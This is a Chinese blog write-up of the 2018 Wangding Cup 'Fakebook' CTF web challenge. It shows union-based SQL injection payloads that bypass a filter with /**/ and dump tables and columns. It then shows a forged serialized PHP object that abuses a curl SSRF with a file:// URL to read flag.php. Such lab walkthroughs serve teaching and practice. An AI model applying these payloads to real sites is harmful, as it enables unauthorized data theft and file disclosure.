[网鼎杯 2018]Fakebook 1

最新推荐文章于 2024-04-24 17:24:28 发布
最新推荐文章于 2024-04-24 17:24:28 发布
阅读量200 收藏
点赞数
分类专栏: CTF-WEB 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46196627/article/details/125236431
版权

[网鼎杯 2018]Fakebook1

在这里插入图片描述
注册发现view.php?no=1
在这里插入图片描述
尝试基本的sql语句发现可行,但是存在过滤,union select 可为union/**/select使用
在这里插入图片描述
获取回显点。
查询user 发现root权限

在这里插入图片描述
在之前用dirsearch扫过备份文件,扫出:
在这里插入图片描述
在这里插入图片描述
访问robots.txt,存有文件,一个类
在这里插入图片描述

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

在这引入一个load_file函数
load_file函数只有在满足两个条件的情况下才可以使用:

1、文件权限:chmod a+x pathtofile

2、文件大小:必须小于max_allowed_packet

可以先尝试load_file读取flag 毕竟扫到一个flag.php 文件。load_file路径是个完整路径,在SQL报错时可以获取到路径。
在这里插入图片描述
另一种思路union 联合注入

获取表

 ?no=-1%20union/**/select%201,group_concat(table_name),3,4 from
information_schema.tables where table_schema=database()

在这里插入图片描述

获取字段:

?no=-1%20union/**/select%201,group_concat(column_name),3,4 from information_schema.columns where table_name='users'

在这里插入图片描述
no为id username,passwrod 刚刚注册的值,data是什么鬼,看值。

?no=-1%20union/**/select%201,group_concat(data),3,4 from users

O:8:“UserInfo”:3:{s:4:“name”;s:5:“admin”;s:3:“age”;i:18;s:4:“blog”;s:8:“blog.aaa”;}

data将我们输入的值序列化,可能在我调用的时候反序列化显示,在data第4位置传入试试
在这里插入图片描述

反序列化码?结合刚刚robots.txt获取文件。
在这里插入图片描述

curl_exec()可能存在ssrf读取内网文件,构造伪协议file://var/www/html/flag.php

O:8:“UserInfo”:3:{s:4:“name”;s:5:“admin”;s:3:“age”;i:18;s:4:“blog”;s:29:“file://var/www/html/flag.php”;}

?no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:5:"admin";s:5:"admin";s:3:"age";i:18;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

在这里插入图片描述
base64解密发现是flag

龙咯李
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fakebook:Facebook的克隆
05-23
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) ...
[杯 2018]Fakebook1
陈艺秋的博客
06-08 1201
结合起来得出结论,以上代码存在ssrf和反序列化,当我们注册后,把我们的信息序列化一下,然后存进data。注册的其他行数据,差不多都可以乱填,只有一个blog项,估计是后台做了一些限制(必须包含某些字符之类的),随便填会报错。得到关键信息,前面都没有注意这段报错信息,这里包含了一个反序列化函数,和一段路径,后面会用到。路径是之前注入的时候报错爆出来的,序列化值也不用自己生成,之前注入出来了,改长度和值就行。因为出现上面的情况,所以猜测不是字符型注入,用了一点小方法,出现计算,说明是整数型注入。
[杯 2018]Fakebook1解题思路
xiyuanyue的博客
10-08 299
s:3:"age";s:4:"blog";6、一般flag存储在根目录的flag文件或者flag.php文件修改data 数据O:8:"UserInfo":3:{s:4:"name";s:3:"age";s:4:"blog";
BUUCTF——[杯 2018]Fakebook
最新发布
m_de_g的博客
04-24 482
【代码】BUUCTF——[杯 2018]Fakebook
mp12_social_network_fakebook_person
05-15
Mp12-社交络(Fakebook)(人)[ManyToMany] 该应用程序将具有一个名为Person的实体,可以通过/ persons端点进行管理。 帖子将添加一个人,获取将显示所有这些人。 为了使一个人与另一个人成为朋友,我们将向终端...
fakebook-backend:学习个人项目探索MERN堆栈
04-10
Fakebook后端(express和mongodb)(这是一个学习/探索MERN堆栈的个人项目)入门: 确保已安装节点克隆仓库在fakebook文件夹中,创建一个带有dev.env文件的配置文件夹设置环境变量:PORT:value,MONGODB_URL = ...
Fakebook-Day2:在第2天之后,在完善蓝图功能之前
03-31
在“Fakebook-Day2:在第2天之后,在完善蓝图功能之前”这个项目中,我们主要探讨的是如何利用Python编程语言来构建一个类似Facebook的社交络平台。在第二天的开发阶段,我们的重点在于完善项目的蓝图(Blueprint)...
facebook-rockin-最佳自动化-selenium-scrape-no-api-tool-bot-machine-made-to-destroy-facebook:Facebook自动化:登录,喜欢,共享,评论,发布,删除。 包含视频“实际中”。 目的主要是通过在Fakebook平台中填充垃圾内容来破坏Fakebook平台(例如,当您决定离开所有这些Fcking平台时,在其中自杀)。 请安装,测试并提交您自己的改进和功能! 谢谢!
03-03
facebook-rockin最佳自动化Selenium消除无api工具的机器人机器做成销毁facebook ... 特征: 一切都是使用Selenium进行的,没有使用API 可见/无头模式 登录 获取/缓存朋友 遍历时间线 给个赞(也是不同的类型) ...
BUUCTF[杯 2018]Fakebook 1
snowlyzz的博客
05-01 852
来到首页先创建了一个用户 点击自己创建的用户admin: 发现url 疑似有sql注入。   ?n=1 and 1=1 正常回显   ?n=1 and 1=2 回显异常(存在SQL注入)   ?n=1 order by 1# 正常回显   ?n=1 order by 2# 正常回显   ?n=1 order by 3# 正常回显   ?n=1 order by 4# 正常回显   ?n=1 order by 5# 回显异常(判断存在4个字段) 直接联合查询,发现 uni...
SSRF漏洞file伪协议之[杯 2018]Fakebook1
qq_58970968的博客
07-06 1475
关于SSRF漏洞(服务器端伪造)参考SSRF漏洞原理攻击与防御(超详细总结)_零点敲代码的博客-CSDN博客_ssrf漏洞防御SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外隔离的内部系统)SSRF攻击可能存在任何语言编写的应用,接下来将举例php中可能存在SSRF漏洞的函数。1、file_get_
BUUCTF [杯 2018]Fakebook 1
weixin_45642610的博客
01-19 4703
BUUCTF [杯 2018]Fakebook 1 join(注册)一个账号,按用户名进入主页 发现注入点no no=1 order by 4#没事 no=1 order by 5#报错,有4列 no=-1 union/**/select 1,2,3,4#过滤了(union select)用/**/代替空格 回显位是2,注意到有反序列化函数。 爆表名 no=-1 union/**/select 1,group_concat(table_name),3,4 from information_sc
BUUCTF Web [杯 2018]Fakebook1 & [BUUCTF 2018]Online Tool1
网安小趴菜
09-14 438
BUUCTF Web [杯 2018]Fakebook1 & [BUUCTF 2018]Online Tool1
BUU-WEB-[杯 2018]Fakebook
qq_24033605的博客
05-12 186
通过dirsearch爆破出站存在一个**/flag.php**页,但是无法正常读取。 访问robots协议,发现有源码备份文件。 <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->name = $name; .
[杯 2018]Comment
weixin_43940853的博客
03-26 4362
首先爆破弱密码登录,是一个类似留言板的界面,考虑二次注入 git源码泄露 这里要恢复一下文件,否则文件内容显示不全 //write_do.php <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./login.php"); die(...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值